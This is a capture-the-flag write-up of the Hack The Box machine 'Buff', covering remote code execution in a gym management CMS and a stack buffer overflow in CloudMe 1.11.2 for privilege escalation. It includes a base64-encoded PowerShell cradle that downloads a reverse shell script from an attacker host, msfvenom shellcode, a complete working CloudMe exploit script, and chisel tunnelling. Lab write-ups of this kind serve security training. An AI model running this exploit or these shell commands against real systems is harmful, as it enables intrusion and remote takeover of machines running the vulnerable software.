Buff



Skills

  • Exploitation of Gym Management System (CMS)

  • Buffer Overflow - Stack Based, Easy Level (Privilege Escalation)


Reconnaissance

Port scanning with nmap

Open port discovery

nmap -p- --open --min-rate 5000 -n -Pn -sS 10.10.10.198 -oG openports
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-28 17:16 GMT
Nmap scan report for 10.10.10.198
Host is up (0.13s latency).
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
7680/tcp open  pando-pub
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 27.10 seconds

Version and service scan of each port


Port 8080 (HTTP)

With whatweb I analyze the technologies the web server is using

whatweb http://10.10.10.198:8080
http://10.10.10.198:8080 [200 OK] Apache[2.4.43], Bootstrap, Cookies[sec_session_id], Country[RESERVED][ZZ], Frame, HTML5, HTTPServer[Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6], HttpOnly[sec_session_id], IP[10.10.10.198], JQuery[1.11.0,1.9.1], OpenSSL[1.1.1g], PHP[7.4.6], PasswordField[password], Script[text/JavaScript,text/javascript], Shopify, Title[mrb3n's Bro Hut], Vimeo, X-Powered-By[PHP/7.4.6], X-UA-Compatible[IE=edge]

The main page looks like this:

In one section, the CMS in use and its version can be seen

It is vulnerable to unauthenticated remote command execution

searchsploit -m 48506

Running it, I get an interactive session

python2 48506.py http://10.10.10.198:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG

buff\shaun

C:\xampp\htdocs\gym\upload> 

I send myself a PowerShell shell with Invoke-ConPtyShell from nishang

C:\xampp\htdocs\gym\upload> powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANgAuADkALwBJAG4AdgBvAGsAZQAtAFAAbwB3AGUAcgBTAGgAZQBsAGwAVABjAHAALgBwAHMAMQAiACkACgA=

And I receive it in a netcat session

PS C:\xampp\htdocs\gym\upload>whoami
buff\shaun

I can read the first flag

PS C:\Users\shaun\Desktop> type user.txt
e3ea350fb743481f34778c0522e3cec2

Escalation

In the Downloads directory there is a CloudMe installer

PS C:\Users\shaun\Downloads> dir


    Directory: C:\Users\shaun\Downloads


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       16/06/2020     16:26       17830824 CloudMe_1112.exe

This version is vulnerable to a buffer overflow

searchsploit Cloudme
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                 |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)                                                                                                                                         | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)                                                                                                                                | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)                                                                                                                                | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)                                                                                                                               | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)                                                                                                                        | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)                                                                                                                 | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow                                                                                                                                    | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt                                                                                                                                | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)                                                                                                                       | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow                                                                                                                                        | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)                                                                                                                     | windows_x86-64/remote/44784.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

On a Windows machine, I install that version to debug it. From the Windows Defender Firewall, I create a rule that opens port 8888, which is the port this service uses by default

I apply local port forwarding so that the port listening on localhost is reachable from another interface

PS C:\Windows\system32> netsh interface portproxy add v4tov4 listenport=8888 listenaddress=10.10.0.128 connectport=8888 connectaddress=127.0.0.1

To start, the Python script will contain the global variables and a payload to make sure EIP gets overwritten

import socket, signal, sys

def def_handler(sig, frame):
    sys.exit(1)


# Ctrl+C
signal.signal(signal.SIGINT, def_handler)


# Global variables
ip = "10.10.0.128"
port = 8888

# 3000 bytes of "A": enough to overrun the buffer and overwrite EIP
payload = b"A"*3000

def makeConnection():

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(payload)
    s.close()


# Main
if __name__ == '__main__':

    makeConnection()

With Immunity Debugger, I attach to the process

I create a pattern to send as the payload and find the offset

pattern_create.rb -l 3000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9

I take the EIP value

pattern_offset.rb -q 316A4230
[*] Exact match at offset 1052
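As an added example (not the page's code, and not Metasploit's), the following Python reimplements the cyclic-pattern logic behind pattern_create.rb and pattern_offset.rb, so the reader can see why the EIP value 316A4230 read in the debugger corresponds to offset 1052: x86 is little-endian, so the four bytes in EIP appear in the pattern in reverse order ("0Bj1"). The same packing explains why an address such as 0x68a98a7b is written as "\x7b\x8a\xa9\x68" in the script.

```python
import string
import struct

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length):
    """Build the Aa0Aa1...Zz9 cyclic pattern (upper, lower, digit triplets),
    truncated to `length` bytes, like pattern_create.rb -l <length>."""
    out = []
    for up in UPPER:
        for lo in LOWER:
            for d in DIGITS:
                out.append(up + lo + d)
                if len(out) * 3 >= length:
                    return "".join(out)[:length].encode()
    return "".join(out)[:length].encode()


def le_bytes(addr):
    """Pack a 32-bit address the way it must be placed on the stack
    (little-endian), e.g. 0x68a98a7b -> b"\\x7b\\x8a\\xa9\\x68"."""
    return struct.pack("<I", addr)


def pattern_offset(eip_value, length=3000):
    """Return the offset in the pattern of the 4 bytes that landed in EIP,
    like pattern_offset.rb -q <hex>. `eip_value` is the value shown by
    the debugger (e.g. 0x316A4230); -1 means it is not in the pattern."""
    needle = le_bytes(eip_value)          # 0x316A4230 -> b"0Bj1"
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    # Value read from EIP in the write-up after sending the 3000-byte pattern
    print(pattern_offset(0x316A4230))     # 1052
    print(le_bytes(0x68a98a7b))           # b'{\x8a\xa9h'
```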

I want to know where the remaining characters end up

offset = 1052
junk = b"A"*offset

# The 4 "B"s land in EIP; the "C"s show where ESP points after the crash
payload = junk + b"B"*4 + b"C"*100

It is not possible to point directly at a stack address, but it is possible to point at an opcode that jumps to ESP. Before that, it is worth knowing which characters it will not interpret correctly, so they can be added to a badchars list. I use mona.py, an add-on that can be installed in Immunity Debugger

PS C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands> iwr -uri https://raw.githubusercontent.com/corelan/mona/master/mona.py -o mona.py
!mona config -set workingfolder C:\Users\Usuario\Desktop\%p
!mona bytearray

The only one I am going to remove is the null byte, although it is not strictly necessary. I look for the opcode that does the jmp esp

nasm_shell.rb
nasm > jmp esp
00000000  FFE4              jmp esp

I find a DLL that has no protections at all

!mona modules

!mona find -s "\xff\xe4" -m Qt5Core.dll

For that DLL, I keep the addresses with the PAGE_EXECUTE_READ attribute

!mona find -s "\xff\xe4" -m Qt5Core.dll
0x68a98a7b : "\xff\xe4" |  {PAGE_EXECUTE_READ} [Qt5Core.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\Users\Usuario\AppData\Local\Programs\CloudMe\CloudMe\Qt5Core.dll)
0x68bad568 : "\xff\xe4" |  {PAGE_EXECUTE_READ} [Qt5Core.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\Users\Usuario\AppData\Local\Programs\CloudMe\CloudMe\Qt5Core.dll)

By setting a breakpoint at that address (F2) and running the exploit again, I make sure EIP points to ESP

With msfvenom I generate a payload that sends me a reverse shell

msfvenom -p windows/shell_reverse_tcp --platform windows -a x86 LHOST=10.10.0.130 LPORT=443 -f python -b "\x00" -e x86/shikata_ga_nai

The final exploit would look like this:

import socket, signal, sys

def def_handler(sig, frame):
    sys.exit(1)


# Ctrl+C
signal.signal(signal.SIGINT, def_handler)


# Global variables
ip = "10.10.0.128"
port = 8888

offset = 1052
junk = b"A"*offset
bytearrays = (b"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
b"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
b"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
b"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
b"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
b"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
b"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
b"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

# jmp esp in Qt5Core.dll at 0x68a98a7b, written little-endian
eip = b"\x7b\x8a\xa9\x68"

buf =  b""
buf += b"\xbb\xe7\x60\xa9\x3a\xda\xc5\xd9\x74\x24\xf4\x5a"
buf += b"\x31\xc9\xb1\x52\x31\x5a\x12\x03\x5a\x12\x83\x25"
buf += b"\x64\x4b\xcf\x55\x8d\x09\x30\xa5\x4e\x6e\xb8\x40"
buf += b"\x7f\xae\xde\x01\xd0\x1e\x94\x47\xdd\xd5\xf8\x73"
buf += b"\x56\x9b\xd4\x74\xdf\x16\x03\xbb\xe0\x0b\x77\xda"
buf += b"\x62\x56\xa4\x3c\x5a\x99\xb9\x3d\x9b\xc4\x30\x6f"
buf += b"\x74\x82\xe7\x9f\xf1\xde\x3b\x14\x49\xce\x3b\xc9"
buf += b"\x1a\xf1\x6a\x5c\x10\xa8\xac\x5f\xf5\xc0\xe4\x47"
buf += b"\x1a\xec\xbf\xfc\xe8\x9a\x41\xd4\x20\x62\xed\x19"
buf += b"\x8d\x91\xef\x5e\x2a\x4a\x9a\x96\x48\xf7\x9d\x6d"
buf += b"\x32\x23\x2b\x75\x94\xa0\x8b\x51\x24\x64\x4d\x12"
buf += b"\x2a\xc1\x19\x7c\x2f\xd4\xce\xf7\x4b\x5d\xf1\xd7"
buf += b"\xdd\x25\xd6\xf3\x86\xfe\x77\xa2\x62\x50\x87\xb4"
buf += b"\xcc\x0d\x2d\xbf\xe1\x5a\x5c\xe2\x6d\xae\x6d\x1c"
buf += b"\x6e\xb8\xe6\x6f\x5c\x67\x5d\xe7\xec\xe0\x7b\xf0"
buf += b"\x13\xdb\x3c\x6e\xea\xe4\x3c\xa7\x29\xb0\x6c\xdf"
buf += b"\x98\xb9\xe6\x1f\x24\x6c\xa8\x4f\x8a\xdf\x09\x3f"
buf += b"\x6a\xb0\xe1\x55\x65\xef\x12\x56\xaf\x98\xb9\xad"
buf += b"\x38\xad\x37\xad\x3a\xd9\x45\xad\x3b\xa1\xc3\x4b"
buf += b"\x51\xc5\x85\xc4\xce\x7c\x8c\x9e\x6f\x80\x1a\xdb"
buf += b"\xb0\x0a\xa9\x1c\x7e\xfb\xc4\x0e\x17\x0b\x93\x6c"
buf += b"\xbe\x14\x09\x18\x5c\x86\xd6\xd8\x2b\xbb\x40\x8f"
buf += b"\x7c\x0d\x99\x45\x91\x34\x33\x7b\x68\xa0\x7c\x3f"
buf += b"\xb7\x11\x82\xbe\x3a\x2d\xa0\xd0\x82\xae\xec\x84"
buf += b"\x5a\xf9\xba\x72\x1d\x53\x0d\x2c\xf7\x08\xc7\xb8"
buf += b"\x8e\x62\xd8\xbe\x8e\xae\xae\x5e\x3e\x07\xf7\x61"
buf += b"\x8f\xcf\xff\x1a\xed\x6f\xff\xf1\xb5\x80\x4a\x5b"
buf += b"\x9f\x08\x13\x0e\x9d\x54\xa4\xe5\xe2\x60\x27\x0f"
buf += b"\x9b\x96\x37\x7a\x9e\xd3\xff\x97\xd2\x4c\x6a\x97"
buf += b"\x41\x6c\xbf"

# junk fills the buffer up to EIP, eip -> jmp esp, then a NOP sled and the shellcode
payload = junk + eip + b"\x90"*50 + buf

def makeConnection():

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(payload)
    s.close()


# Main
if __name__ == '__main__':

    makeConnection()

I gain access on my local machine

nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.0.130] from (UNKNOWN) [10.10.0.128] 50177
Microsoft Windows [Versión 10.0.19045.2604]
(c) Microsoft Corporation. Todos los derechos reservados.

C:\Users\Usuario\AppData\Local\Programs\CloudMe\CloudMe>

I modify the shellcode so it points to my HTB interface and run it against the victim machine

I need to set up a chisel server to have connectivity to port 8888

chisel server -p 1234 --reverse

From the victim machine I connect

PS C:\Temp> .\chisel.exe client 10.10.16.9:1234 R:socks

I run it through the proxy and can read the second flag

nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.198] 49689
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
6017190dd654891188f60765e18c0658